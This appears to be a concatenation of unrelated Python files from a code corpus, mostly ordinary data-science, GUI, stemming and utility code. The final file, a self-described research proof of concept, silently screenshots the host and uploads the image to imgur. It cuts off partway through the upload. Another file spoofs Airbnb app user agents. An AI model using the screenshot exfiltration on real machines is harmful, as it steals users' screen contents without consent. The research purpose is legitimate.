plt.plot(data['date'], pred)
plt.show()
| 3,620 | 1,140 |
from sklearn.linear_model import LogisticRegression
from sklearn.pipeline import Pipeline
from sklearn.preprocessing import StandardScaler
import numpy as np
from .param_tuning import ParamTuning
class LogisticRegressionTuning(ParamTuning):
"""
サポートベクター分類チューニング用クラス
"""
# 共通定数
SEED = 42 # デフォルト乱数シード
SEEDS = [42, 43, 44, 45, 46, 47, 48, 49, 50, 51] # デフォルト複数乱数シード
CV_NUM = 5 # 最適化時のクロスバリデーションのデフォルト分割数
# 学習器のインスタンス (標準化+ロジスティック回帰のパイプライン)
ESTIMATOR = Pipeline([("scaler", StandardScaler()), ("logr", LogisticRegression())])
# 学習時のパラメータのデフォルト値
FIT_PARAMS = {}
# 最適化で最大化するデフォルト評価指標('neg_log_loss', 'roc_auc', 'roc_auc_ovr'など)
SCORING = 'neg_log_loss'
# 最適化対象外パラメータ
NOT_OPT_PARAMS = {'penalty': 'l2', # 正則化のペナルティ ('l1', 'l2', 'elasticnet')
'solver': 'lbfgs' # 学習に使用するソルバー ('newton-cg', 'lbfgs', 'liblinear', 'sag', 'saga')
}
# グリッドサーチ用パラメータ
CV_PARAMS_GRID = {'C': np.logspace(-2, 3, 21).tolist() # 正則化項C (小さいと未学習寄り、大きいと過学習寄り)
}
# ランダムサーチ用パラメータ
N_ITER_RANDOM = 25 # ランダムサーチの試行数
CV_PARAMS_RANDOM = {'C': np.logspace(-2, 3, 26).tolist()
}
# ベイズ最適化用パラメータ
N_ITER_BAYES = 20 # BayesianOptimizationの試行数
INIT_POINTS = 5 # BayesianOptimizationの初期観測点の個数(ランダムな探索を何回行うか)
ACQ = 'ei' # BayesianOptimizationの獲得関数(https://ohke.hateblo.jp/entry/2018/08/04/230000)
N_ITER_OPTUNA = 25 # Optunaの試行数
BAYES_PARAMS = {'C': (0.01, 1000)
}
INT_PARAMS = []
# 範囲選択検証曲線用パラメータ範囲
VALIDATION_CURVE_PARAMS = {'C': np.logspace(-3, 4, 15).tolist()
}
# 検証曲線表示等で使用するパラメータのスケール('linear', 'log')
PARAM_SCALES = {'C': 'log',
'l1_ratio': 'linear'
}
def _not_opt_param_generation(self, src_not_opt_params, seed, scoring):
"""
チューニング対象外パラメータの生成(seed追加、loglossかつSVRのときのprobablity設定など)
Parameters
----------
src_not_opt_params : Dict
処理前のチューニング対象外パラメータ
seed : int
乱数シード
scoring : str
最適化で最大化する評価指標
"""
# 乱数シードをnot_opt_paramsのrandom_state引数に追加
if 'random_state' in src_not_opt_params:
src_not_opt_params['random_state'] = seed
return src_not_opt_params | 2,388 | 1,302 |
import os
os.environ['MPLCONFIGDIR'] = os.getcwd() + "/configs/"
import matplotlib
import pandas as pd
import seaborn as sns
import matplotlib.pyplot as plt
import numpy as np
df = pd.read_csv('medical_examination.csv')
df['overweight'] = (df['weight'] / (df['height']/100)**2).apply(lambda x: 1 if x > 25 else 0)
df['cholesterol'] = df['cholesterol'].apply(lambda x: 0 if x == 1 else 1)
df['gluc'] = df['gluc'].apply(lambda x: 0 if x == 1 else 1)
def draw_cat_plot():
df_cat = pd.melt(df, id_vars = 'cardio', var_name = 'variable', value_vars = ['alco', 'active','cholesterol', 'gluc', 'overweight','smoke'])
df_cat = pd.melt(df, var_name = 'variable', value_vars = ['active','alco','cholesterol', 'gluc','overweight','smoke'], id_vars = 'cardio')
# Desenha o catplot com 'sns.catplot()'
fig = sns.catplot(data=df_cat, kind="count", x="variable",hue="value", col="cardio").set_axis_labels("variable", "total")
fig = fig.fig
fig.savefig('catplot.png')
return fig
def draw_heat_map():
# limpa a Data
df_heat = df[(df['ap_lo']<=df['ap_hi']) &
(df['height'] >= df['height'].quantile(0.025))&
(df['height'] <= df['height'].quantile(0.975))&
(df['weight'] >= df['weight'].quantile(0.025))&
(df['weight'] <= df['weight'].quantile(0.975))
]
corr = df_heat.corr()
mask = np.triu(corr)
fig, ax = plt.subplots(figsize=(7, 5))
sns.heatmap(corr,mask=mask, fmt='.1f',vmax=.3, linewidths=.5,square=True, cbar_kws = {'shrink':0.5},annot=True, center=0)
fig.savefig('heatmap.png')
return fig
| 1,578 | 641 |
import pygame
from gui.guielement import GuiElement
HORIZONTAL = 0
VERTICAL = 1
class GuiScrollbar(GuiElement):
"""
scrollbar / slider
"""
def __init__(self, x, y, width, height, fontObj, value=0.0, orientation=HORIZONTAL, barLength=30):
GuiElement.__init__(self, x, y, width, height, fontObj)
self._value = value
self._orientation = orientation
self._barLength = barLength
self.setEventTypes(pygame.MOUSEBUTTONDOWN, pygame.MOUSEBUTTONUP, pygame.MOUSEMOTION)
self._grabbed = False
self._func = None
def getValue(self):
return self._value
def setValue(self, value):
self._value = min(max(value, 0), 1)
def connect(self, func, *params):
self._func = func
self._params = params
return self
def update(self, t):
pass
def canHandleEvent(self, event):
return GuiElement.canHandleEvent(self, event)
def handleEvent(self, event):
if event.type == pygame.MOUSEBUTTONDOWN and event.button == 1:
if self._aabb.contains(*pygame.mouse.get_pos()):
self._grabbed = True
return True
elif event.type == pygame.MOUSEBUTTONUP and event.button == 1:
if self._grabbed:
self._grabbed = False
if self._func != None:
self._func(*self._params)
return True
elif event.type == pygame.MOUSEMOTION:
if self._grabbed:
if self._orientation == HORIZONTAL:
self.setValue(
(event.pos[0] - self._barLength / 2.0 - self.getX()) / (self.getWidth() - self._barLength))
else:
self.setValue(
(event.pos[1] - self._barLength / 2.0 - self.getY()) / (self.getHeight() - self._barLength))
return True
return False
def draw(self, screen):
screen.fill((50, 50, 50), self.getRect())
if self._orientation == HORIZONTAL:
y = self.getY() + self.getHeight() / 2.0 - 1
screen.fill((255, 255, 255), (self.getX(), y, self.getWidth(), 2))
barX = self.getX() + self._value * (self.getWidth() - self._barLength)
screen.fill((100, 200, 255), (barX, self.getY(), self._barLength, self.getHeight()))
else:
x = self.getX() + self.getWidth() / 2.0 - 1
screen.fill((255, 255, 255), (x, self.getY(), 2, self.getHeight()))
barY = self.getY() + self._value * (self.getHeight() - self._barLength)
screen.fill((100, 200, 255), (self.getX(), barY, self.getWidth(), self._barLength))
| 2,785 | 965 |
# -*- coding: utf-8 -*-
# -*- coding: utf-8 -*-
"""
Naturalunit system.
The natural system comes from "setting c = 1, hbar = 1". From the computer
point of view it means that we use velocity and action instead of length and
time. Moreover instead of mass we use energy.
"""
from __future__ import division
from sympy.physics.unitsystems.dimensions import Dimension, DimensionSystem
from sympy.physics.unitsystems.units import Unit, Constant, UnitSystem
from sympy.physics.unitsystems.prefixes import PREFIXES, prefix_unit
# base dimensions
action = Dimension(name="action", symbol="A", length=2, mass=1, time=-1)
energy = Dimension(name="energy", symbol="E", length=2, mass=1, time=-2)
velocity = Dimension(name="velocity", symbol="V", length=1, time=-1)
# derived dimensions
length = Dimension(name="length", symbol="L", length=1)
mass = Dimension(name="mass", symbol="M", mass=1)
time = Dimension(name="time", symbol="T", time=1)
acceleration = Dimension(name="acceleration", length=1, time=-2)
momentum = Dimension(name="momentum", mass=1, length=1, time=-1)
force = Dimension(name="force", symbol="F", mass=1, length=1, time=-2)
power = Dimension(name="power", length=2, mass=1, time=-3)
frequency = Dimension(name="frequency", symbol="f", time=-1)
dims = (length, mass, time, momentum, force, energy, power, frequency)
# dimension system
natural_dim = DimensionSystem(base=(action, energy, velocity), dims=dims,
name="Natural system")
# base units
hbar = Constant(action, factor=1.05457266e-34, abbrev="hbar")
eV = Unit(energy, factor=1.60219e-19, abbrev="eV")
c = Constant(velocity, factor=299792458, abbrev="c")
units = prefix_unit(eV, PREFIXES)
# unit system
natural = UnitSystem(base=(hbar, eV, c), units=units, name="Natural system")
| 1,785 | 617 |
import random
import uuid
import os
class RandomRequest(object):
@classmethod
def get_random_user_agent(cls):
with open(os.path.join(os.path.dirname(os.path.realpath(__file__)), 'files/supported_ios_versions.txt')) as f:
ios_versions = f.read().splitlines()
with open(os.path.join(os.path.dirname(os.path.realpath(__file__)), 'files/airbnb_versions.txt')) as f:
airbnb_versions = f.read().splitlines()
return "Airbnb/{} iPhone/{} Type/Phone".format(random.choice(airbnb_versions), random.choice(ios_versions))
@classmethod
def get_random_udid(cls):
hex_digits = "0123456789abcdef"
return ''.join(random.choice(hex_digits) for _ in range(40))
@classmethod
def get_random_uuid(cls):
return str(uuid.uuid4()).upper()
| 816 | 279 |
from typing import Union
__all__ = [
'num',
]
num = Union[int, float]
| 76 | 30 |
from pylint.reporters.json import JSONReporter
def json_reporter_handle_message(self, msg):
"""Manage message of different type and in the context of path."""
self.messages.append({
'path': msg.path,
'abspath': msg.abspath,
'line': msg.line,
'column': msg.column,
'module': msg.module,
'obj': msg.obj,
'msg': msg.msg,
'msg_id': msg.msg_id,
'symbol': msg.symbol,
'C': msg.C,
'category': msg.category,
})
JSONReporter.handle_message = json_reporter_handle_message
def output_lint_result(lint_result, msg_template):
lint_module = lint_result[0]['module']
if lint_module:
print("************* Module {module}".format(module=lint_module))
else:
print("************* ")
for msg in lint_result:
print(msg_template.format(**msg))
| 867 | 283 |
from nltk.stem import SnowballStemmer
from nltk.stem.api import StemmerI
import nltk
import json
class ParticleStemmer(SnowballStemmer):
def __init__(self, language="english", ignore_stopwords=False, suffix_rule_list={}):
super().__init__(language=language, ignore_stopwords=ignore_stopwords)
if language == "english":
self.stemmer._EnglishStemmer__special_words.update({
"experiment":"experiment",
"experimented":"experiment",
"experimenting":"experiment",
"experiments":"experiment",
'organization': 'organiz',
"organization's": 'organiz',
'organizational': 'organiz',
'organizationally': 'organiz',
'organizations': 'organiz',
'organize': 'organiz',
'organized': 'organiz',
'organizer': 'organiz',
'organizers': 'organiz',
'organizes': 'organiz',
'organizing': 'organiz',
'science': 'scient',
'sciences': 'scient',
'scientific': 'scient',
'scientifically': 'scient',
'scientist': 'scient',
'scientistic': 'scient',
'scientists': 'scient',
'animal': 'animal',
'animalism': 'animal',
'animalistic': 'animal',
'animalities': 'animal',
'animality': 'animal',
'animals': 'animal',
'customer': 'customer',
'ratability': 'rate',
'ratable': 'rate',
'ratably': 'rate',
'rate': 'rate',
'rateable': 'rate',
'rateably': 'rate',
'rated': 'rate',
'rater': 'rate',
'raters': 'rate',
'rates': 'rate',
'rating': 'rate',
'ratings': 'rate',
'ratio': 'rate',
'ratios': 'rate',
'ration': 'ration',
'rations': 'ration',
'rationed': 'ration',
'rationing': 'ration',
'ratification': 'ratifi',
'ratified': 'ratifi',
'ratifier': 'ratifi',
'ratifiers': 'ratifi',
'ratifies': 'ratifi',
'ratify': 'ratifi',
'ratifying': 'ratifi',
'rational': 'rational',
'rationale': 'rational',
'rationales': 'rational',
'rationalism': 'rational',
'rationalist': 'rational',
'rationalistic': 'rational',
'rationalistically': 'rational',
'rationalists': 'rational',
'rationalities': 'rational',
'rationality': 'rational',
'rationalization': 'rational',
'rationalizations': 'rational',
'rationalize': 'rational',
'rationalized': 'rational',
'rationalizer': 'rational',
'rationalizers': 'rational',
'rationalizes': 'rational',
'rationalizing': 'rational',
'rationally': 'rational',
'rationalness': 'rational',
'rationals': 'rational',
'ionization': 'ion',
'ionizer': 'ion',
'ionizers': 'ion',
'ionizations': 'ion',
'chemistry': 'chem',
'chemistries': 'chem',
'chemist': 'chem',
'chemists': 'chem',
'chemism': 'chem',
'chemisms': 'chem',
'stable': 'stabil',
'stabled': 'stabil',
'stableness': 'stabil',
'laboratorial': 'lab',
'laboratorially': 'lab',
'laboratorian': 'lab',
'laboratories': 'lab',
'laboratory': 'lab',
'preppie': 'prep',
'preppies': 'prep',
'preparation': 'prep',
'preparations': 'prep',
'preparatorily': 'prep',
'preparatory': 'prep',
'prepare': 'prep',
'prepared': 'prep',
'preparedness': 'prep',
'preparer': 'prep',
'preparers': 'prep',
'prepares': 'prep',
'preparing': 'prep',
'publication': 'publish',
'publications': 'publish',
'microfluidiсs': 'microfluid',
'microfluidiс': 'microfluid',
'transmissibility': 'transmitt',
'transmissible': 'transmitt',
'transmission': 'transmitt',
'transmissions': 'transmitt',
'transmissive': 'transmitt',
'transmitting': 'transmitt',
'transmitted': 'transmitt',
'transmit': 'transmitt',
'transmits': 'transmitt',
'compliant': 'complianc',
'compliantly': 'complianc',
'allergic': 'allergen',
'allergies': 'allergen',
'allergin': 'allergen',
'allergist': 'allergen',
'allergists': 'allergen',
'allergology': 'allergen',
'allergy': 'allergen',
'reproduction': 'reproduc',
'reproductions': 'reproduc',
'reproductive': 'reproduc',
'reproductively': 'reproduc',
'reproductiveness': 'reproduc',
'reproductivity': 'reproduc',
'filtrable': 'filter',
'filtrate': 'filter',
'filtrated': 'filter',
'filtrates': 'filter',
'filtrating': 'filter',
'filtration': 'filter',
'programmable': 'program',
'programmability': 'program',
'programme': 'program',
'programmata': 'program',
'programmatic': 'program',
'programmatically': 'program',
'programmer': 'program',
'programmers': 'program',
'programmes': 'program',
'formation': 'form',
'include': 'inclus',
'includes': 'inclus',
'including': 'inclus',
'included': 'inclus',
'dosage': 'dose',
'dosages': 'dose',
'seq':'sequenc',
'mineral':'mineral',
'minerals':'mineral',
'mineralization':'mineral',
'mineralize':'mineral',
'mineralized':'mineral',
'mineralizes':'mineral',
'mineralizing':'mineral',
'designate':'designat',
'designated':'designat',
'designates':'designat',
'designating':'designat',
'designation':'designat',
'designations':'designat',
'designative':'designat',
'designator':'designat',
'designment':'designat',
'genesys':'genesys',
'poly':'poly',
'sepsis':'sept',
'fabulist':'fabl',
'fabulists':'fabl',
'flautist':'flut',
'flautists':'flut',
'hygeist':'hygien',
'hygieist':'hygien',
'hygeists':'hygien',
'hygieists':'hygien',
'hypothesist':'hypothe',
'hypothesists':'hypothe',
'lutanist':'lute',
'lutanists':'lute',
'lutenist':'lute',
'lutenists':'lute',
'lutist':'lute',
'lutists':'lute',
'magisterial':'magist',
'magisterially':'magist',
'magisterialness':'magist',
'magistery':'magist',
'magistracies':'magist',
'magistracy':'magist',
'magistrateship':'magist',
'magistrature':'magist',
'mister':'mister',
'mr':'mister',
'misters':'mister',
'mistier':'misti',
'mistiest':'misti',
'piano':'pian',
'pianos':'pian',
'cellist':'cello',
'cellists':'cello',
'orthopaedic':'orthoped',
'orthopaedics':'orthoped',
'orthopaedist':'orthoped',
'orthopaedist':'orthoped',
'papist':'papa',
'papistries':'papa',
'papistry':'papa',
'papists':'papa',
'protista':'protist',
'rapist':'rape',
'rapists':'rape',
'scenarist':'scenario',
'scenarists':'scenario',
'tourism':'tourist',
'tourisms':'tourist',
'admin':'administr',
'administer':'administr',
'administered':'administr',
'administerial':'administr',
'administering':'administr',
'administerings':'administr',
'administers':'administr',
'administratrices':'administr',
'administratrix':'administr',
'characterless':'charact',
'charactery':'charact',
'geoscience': 'geoscient',
'geosciences': 'geoscient',
'geoscientific': 'geoscient',
'geoscientifically': 'geoscient',
'geoscientist': 'geoscient',
'geoscientistic': 'geoscient',
'geoscientists': 'geoscient',
'bioscience': 'bioscient',
'biosciences': 'bioscient',
'bioscientific': 'bioscient',
'bioscientifically': 'bioscient',
'bioscientist': 'bioscient',
'bioscientistic': 'bioscient',
'bioscientists': 'bioscient',
})
from partstem.word_list import word_list
self.word_list = word_list
self.word_list += nltk.corpus.words.words()
self.stem = self.__stem
self.suffix_rule_list = {
'ant': {"with": ['ation'], "exception": []},
'eti': {"with": ['ant', ''], "exception": []},
'or': {"with": ['ion'], "exception": []},
'um': {"with": ['a'], "exception": ["medium"]},
'a': {"with": ['um', 'ary+ '], "exception": ["media"]},
'ri': {"with": [' -ried', 'er', 'tes'], "exception": []},
'er': {"with": ['y'], "exception": []},
'al': {"with": ['us'], "exception": ["animal"]},
'us': {"with": ['al'], "exception": []},
'ifi': {"with": ['e'], "exception": ["modifi", "specifi"]},
'e': {"with": ['ification'], "exception": []},
'ion': {"with": ['e'], "exception": []},
'i': {"with": ['e', 'us', 'er', 'y+ ', 'y+ic'], "exception": ["ii"]},
'si': {"with": ['sis'], "exception": ["genesi"]},
's': {"with": ['sis'], "exception": ["genes"]},
't': {"with": ['sis'], "exception": []},
'z': {"with": ['sis'], "exception": []},
"ier": {"with": ["ying", ""], "exception": []},
"abl": {"with": ["e", "es", "ate", "ation", "ed", "en", "ies", ""], "exception": ["stabl", "capabl", "fabl", "arabl", "cabl", "constabl", "decasyllabl", "despicabl", "diabl", "disabl", "effabl", "enabl", "formidabl", "gabl", "gullabl", "impeccabl", "improbabl", "incapabl", "ineffabl", "inevitabl", "inviabl", "invariabl", "viabl", "variabl", "liabl", "probabl", "syllabl", "monosyllabl", "nonstabl", "unstabl", "uncapabl", "nonviabl", "parabl", "peccabl", "polysyllabl", "sabl", "permeabl", "semipermeabl", "tabl", "tenabl", "thermostabl", "timetabl", "unabl", "vegetabl", "vocabl", "worktabl"]},
"th": {"with": [""], "exception": []},
"atori": {"with": ["ation"], "exception": []},
"ori": {"with": ["ion"], "exception": []},
"ous": {"with": ["y", "", "e", "on", "ity"], "exception": []},
"ic": {"with": ["", "e"], "exception": ["sonic", "polic", "indic"]},
"iti": {"with": ["est+ification"], "exception": []},
"iz": {"with": ["ize", "izate"], "exception": []},
"at": {"with": ["atic", "ance"], "exception": []},
'if': {"with": ["ity+est", "e"], "exception": ["modif", "specif"]},
'ist': {"with": ['ism', 'ed', 'ical', 'y', 'ium', 'est', 'ic', 'e', 'o', 'al', 'a', ''], "exception": ["mist", "agonist", "assist", "list", "backlist", "ballist", "banist", "bannist", "barrist", "batist", "booklist", "canist", "casuist", "checklist", "christ", "cist", "fist", "closefist", "exist", "coexist", "consist", "delist", "desist", "enlist", "twist", "entwist", "feist", "filist", "foist", "gist", "grist","hagadist", "heist", "heurist", "hist", "hoist", "inconist", "insist", "intwist", "resist", "irresist", "joist", "kist", "legist", "logist", "magist", "maist", "minist", "modist", "moist", "specialist", "sophist", "statist", "waist", "pantywaist", "persist", "poltergeist", "preenlist", "preexist", "regist", "protist", "reenlist", "relist", "shirtwaist", "shist", "sinist", "subsist", "tourist", "underwaist", "unlist", "untwist", "whist", "wist", "wrist", "zeitgeist"]},
'ism': {"with": ['ist', 'ic', ''], "exception": ["tourism"]},
}
self.suffix_rule_list.update(suffix_rule_list)
self.suffix_list = sorted(list(self.suffix_rule_list.keys()), key=lambda x: -len(x))
def __stem(self, word, return_snowball=False):
if not word.startswith("improv"):
remove_suffix = {"isate":"izate", "isated":"izated", "isating":"izating", "isates":"izates"}
for key in remove_suffix.keys():
if word.endswith(key):
word = word[:-len(key)] + remove_suffix[key]
break
remove_suffix = {"ise":"ize", "ised":"ized", "ising":"izing", "ises":"izes"}
for key in remove_suffix.keys():
if word.endswith(key):
new_word = word[:-len(key)] + remove_suffix[key]
if new_word in self.word_list:
word = new_word
break
word = self.stemmer.stem(word)
stem_word = word
num = 0
if word not in list(self.stemmer._EnglishStemmer__special_words.keys()) + list(self.stemmer._EnglishStemmer__special_words.values()) and len(word) >= 3:
while num < len(self.suffix_list):
if stem_word.endswith(self.suffix_list[num]) and stem_word not in self.suffix_rule_list[self.suffix_list[num]]["exception"]:
without_suffix = stem_word[:-len(self.suffix_list[num])]
if len(without_suffix) == 0:
num += 1
continue
for el in self.suffix_rule_list[self.suffix_list[num]]["with"]:
el = el.replace("+", " ")
el = el.replace("-", " -") if "-" in el and " -" not in el else el
el = el.split(" ")
key = True
for el1 in el:
if not ((without_suffix + el1 in self.word_list and not el1.startswith("-")) or (without_suffix + el1.replace("-", "") not in self.word_list and el1.startswith("-"))):
key = False
break
if key:
stem_word = without_suffix
break
break
num += 1
return (stem_word, word) if return_snowball else stem_word if len(stem_word) >= 3 else word
partstem = ParticleStemmer()
| 12,492 | 5,695 |
import os
from abacusevents.utils import env, lowercase_first
def test_env_is_short_for_os_dot_environ():
os.environ['FOO'] = 'BAR'
assert env('FOO') == 'BAR'
def test_env_lets_you_specify_a_default_value():
default = env('NOT_THERE', 'FOO')
assert default == 'FOO'
def test_env_wont_explode():
assert env('NOTHING') is None
def test_lowercase_first():
assert lowercase_first('Ping') == 'ping'
assert lowercase_first('') == ''
assert lowercase_first('fOO') == 'fOO'
assert lowercase_first(None) == ''
assert lowercase_first(False) == ''
assert lowercase_first([]) == ''
assert lowercase_first([1]) == ''
assert lowercase_first((1,)) == ''
| 700 | 253 |
#!/usr/bin/env python
# coding: utf-8
# In[ ]:
def LoadnClean (path):
import pandas as pd
import seaborn as sns
import matplotlib.pyplot as plt
import numpy as np
df = (
pd.read_csv(path,index_col = 0)
)
df1 = ( df
.replace("",float("NaN"))
.dropna()
.reset_index(drop=True)
)
df2 = ( df1
.drop(index=df1.index[0])
.rename(columns={"X1":"Credit Limit",
"X2":"Sex",
"X3":"Education",
"X4":"Marital Status",
"X5":"Age",
"X6":"Pay/Sept07",
"X6":"PayStat/Sept05",
"X7":"PayStat/Aug05",
"X8":"PayStat/Jul05",
"X9":"PayStat/Jun05",
"X10":"PayStat/May05",
"X11":"PayStat/Apr05",
"X12":"Outstanding/Sept05",
"X13":"Outstanding/Aug05",
"X14":"Outstanding/Jul05",
"X15":"Outstanding/Jun05",
"X16":"Outstanding/May05",
"X17":"Outstanding/Apr05",
"X18":"Paid/Sept05",
"X19":"Paid/Aug05",
"X20":"Paid/Jul05",
"X21":"Paid/Jun05",
"X22":"Paid/May05",
"X23":"Paid/Apr05",
"Y":"Default"
})
.apply(pd.to_numeric)
.replace({'Sex': {1: "M", 2: 'F'}})
.replace({'Education': {1: "MSc or PHd", 2: 'BSc', 3: 'High School Diploma', 4:"Other", 5:"Delete", 6:"Delete", 0:"Delete"}})
.replace({'Marital Status': {1: "Married", 2: 'Single', 3: 'Other', 0:"Delete"}})
.replace({'Default': {1: "True", 0: 'False'}})
.loc[lambda row : ~row['Education'].str.contains('Delete')]
.loc[lambda row : ~row['Marital Status'].str.contains('Delete')]
)
df2
df3 = ( df2
.assign(Payment_Score=(df2["PayStat/Sept05"]+df2['PayStat/Aug05']+df2['PayStat/Jul05']+df2['PayStat/Jun05']+df2['PayStat/May05']+df2['PayStat/Apr05']+6)/6)
.assign(Avg_Outstanding=(df2["Outstanding/Sept05"]+df2['Outstanding/Aug05']+df2['Outstanding/Jul05']+df2['Outstanding/Jun05']+df2['Outstanding/May05']+df2['Outstanding/Apr05'])/6)
.assign(Avg_Paid=(df2["Paid/Sept05"]+df2['Paid/Aug05']+df2['Paid/Jul05']+df2['Paid/Jun05']+df2['Paid/May05']+df2['Paid/Apr05'])/6)
.drop(["PayStat/Jun05","PayStat/Sept05","PayStat/Aug05","PayStat/Jul05","PayStat/May05","PayStat/Apr05"], axis=1)
.drop(["Outstanding/Sept05","Outstanding/Aug05","Outstanding/Apr05","Outstanding/Jul05","Outstanding/Jun05","Outstanding/May05"], axis=1)
.drop(["Paid/Sept05","Paid/Aug05","Paid/Apr05","Paid/Jul05","Paid/Jun05","Paid/May05"], axis=1)
.reindex(columns=["Credit Limit", "Sex", "Education","Marital Status","Age","Payment_Score","Avg_Outstanding","Avg_Paid","Default"])
)
df3
return df3
def AgevsDefault (df):
import pandas as pd
import seaborn as sns
import matplotlib.pyplot as plt
import numpy as np
x,y = 'Age', 'Default'
(df
.groupby(x)[y]
.value_counts(normalize=True)
.mul(100)
.rename('percent')
.reset_index()
.pipe((sns.catplot,'data'), x=x,y='percent',height=5,aspect=3,hue=y,kind='bar'))
def JustPayments(path):
import pandas as pd
import seaborn as sns
import matplotlib as plt
import numpy as np
df1 = (
pd.read_csv(path,index_col = 0)
)
df2 = ( df1
.drop(index=df1.index[0])
.rename(columns={"X1":"Credit Limit",
"X2":"Sex",
"X3":"Education",
"X4":"Marital Status",
"X5":"Age",
"X6":"Pay/Sept07",
"X6":"PaySep",
"X7":"PayAug",
"X8":"PayJul",
"X9":"PayJun",
"X10":"PayMay",
"X11":"PayApr",
"X12":"Outstanding/Sept05",
"X13":"Outstanding/Aug05",
"X14":"Outstanding/Jul05",
"X15":"Outstanding/Jun05",
"X16":"Outstanding/May05",
"X17":"Outstanding/Apr05",
"X18":"Paid/Sept05",
"X19":"Paid/Aug05",
"X20":"Paid/Jul05",
"X21":"Paid/Jun05",
"X22":"Paid/May05",
"X23":"Paid/Apr05",
"Y":"Default"
})
.apply(pd.to_numeric) )
df2
df3 = ( df2
.assign(Payment_Score=(df2["PaySep"]+df2['PayAug']+df2['PayJul']+df2['PayJun']+df2['PayMay']+df2['PayApr']+6)/6)
.assign(Avg_Outstanding=(df2["Outstanding/Sept05"]+df2['Outstanding/Aug05']+df2['Outstanding/Jul05']+df2['Outstanding/Jun05']+df2['Outstanding/May05']+df2['Outstanding/Apr05'])/6)
.assign(Avg_Paid=(df2["Paid/Sept05"]+df2['Paid/Aug05']+df2['Paid/Jul05']+df2['Paid/Jun05']+df2['Paid/May05']+df2['Paid/Apr05'])/6)
.drop(["Sex","Marital Status","Education"], axis=1)
)
df3["PaySep"]=df3["PaySep"]+1
df3["PayAug"]=df3["PayAug"]+1
df3["PayJul"]=df3["PayJul"]+1
df3["PayJun"]=df3["PayJun"]+1
df3["PayMay"]=df3["PayMay"]+1
df3["PayApr"]=df3["PayApr"]+1
df3
return df3
def Defaulters(df):
df4 = (df.loc[lambda x: x['Default']==1]
)
return df4
| 6,340 | 2,203 |
from flask import Flask
import os
templates_folder = os.path.abspath("application/view/templates")
static_folder = os.path.abspath("application/view/static")
app = Flask(__name__,template_folder=templates_folder,static_folder=static_folder)
from application.controller import hello_controller | 305 | 93 |
#Just a simple script to automate the YAML front matter in new posts
import datetime
import os
title = raw_input('\nEnter title: ')
fileName= title.replace(" ", "_").lower() + '.md'
print fileName + '\n'
text = """---
layout: project
title: {}
date: Feb 2015
thumbnail: http://devchuk.github.io/devchukV1/res/img/portimg/parrot/prof.jpg
thumbnail_size: half-img
client: PROJECT
client_name: {}
role: Full-stack developer
platforms: Web
status: Active
featured: True
desc: Here is a medium-length description about the project.
---
""".format(title, title)
file = open(fileName, "w")
file.write(text)
print '\nFile is generated!'
os.system("atom " + fileName)
| 664 | 220 |
# -*- coding: utf-8 -*-
'''pre load default TSP city data into database'''
from django.db.transaction import atomic
from ..models import *
import os
@atomic
def atomic_save(items):
for item in items:
item.save()
# Load default city data
def load_cities(cities_folder_path, delete=False):
'''
Load data files in cities_folder_path to database
if delete is True, previous data in database will be deleted
'''
if delete:
print('\nDeleting all previous city data...')
City.objects.all().delete()
print('Deletion completes\n')
print('Adding city data...\n')
cities = []
print('Loading %s ...' % cities_folder_path)
for root, dirs, files in os.walk(cities_folder_path):
for name in files:
filePath = os.path.join(root, name)
print('Loading %s ...' % filePath)
flag = False
try:
with open(filePath, mode='rb') as f:
for line in f:
# Check dimension info
if line.find(b'EDGE_WEIGHT_TYPE\n') != -1:
if line.split(':')[-1].find(b'EUC_2D') == -1:
raise Exception('Only two-dimension supported.')
# Start process node
if line.find(b'NODE_COORD_SECTION') != -1:
flag = True
continue
if line.find(b'EOF') != -1:
break
if flag:
s = str(line, encoding='utf-8')
temp = s.split(' ')
cities.append(City(
id = temp[0],
X = temp[1],
Y = temp[2]
))
except Exception as result:
print('Err:%s' % result)
print('\nSaving city data...')
atomic_save(cities)
print('Save complates')
def pre_load_data(currentPath):
load_cities(os.path.join(currentPath, 'Cities'), True)
| 1,820 | 566 |
# Copyright 2019 Netskope, Inc.
# Redistribution and use in source and binary forms, with or without modification, are permitted provided that the
# following conditions are met:
#
# 1. Redistributions of source code must retain the above copyright notice, this list of conditions and the following
# disclaimer.
#
# 2. Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided with the distribution.
#
# 3. Neither the name of the copyright holder nor the names of its contributors may be used to endorse or promote
# products derived from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES,
# INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,
# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
# Written by Erick Galinkin
#
# This code is a proof of concept intended for research purposes only. It does not contain any payloads. It is not
# weaponized.
import requests
import utils
import time
import tempfile
import shutil
import base64
import os
import tweepy
from tweepy.api import API
import json
user_agent = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) " \
"Chrome/74.0.3729.169 Safari/537.36"
def imgur_capture_screen(creds, sleep=0, admin=False):
"""
Captures the screen after (optionally) sleeping for some number of seconds and uploads it to imgur.
If admin is set to true (that is, if you're admin!)
Returns the imgur link.
"""
time.sleep(sleep)
if admin:
tempdir = tempfile.mkdtemp()
fname = utils.screenshot(tempdir, "screencap.png")
else:
fname = utils.screenshot("./", "screencap.png")
link = imgur_upload_image(fname, creds)
if admin:
shutil.rmtree(tempdir)
else:
os.remove(fname)
return link
def imgur_upload_image(image_path, creds):
url = "https://api.imgur.com/3/image"
headers = {
'user-agent': user_agent,
'authorization': 'Client-ID {}'.format(creds)
}
try:
r = requests.post(
url,
headers=headers,
data={
'image': base64.b64encode(open(image_path, 'rb').read()),
'title': image_path
}
)
data = r.json()
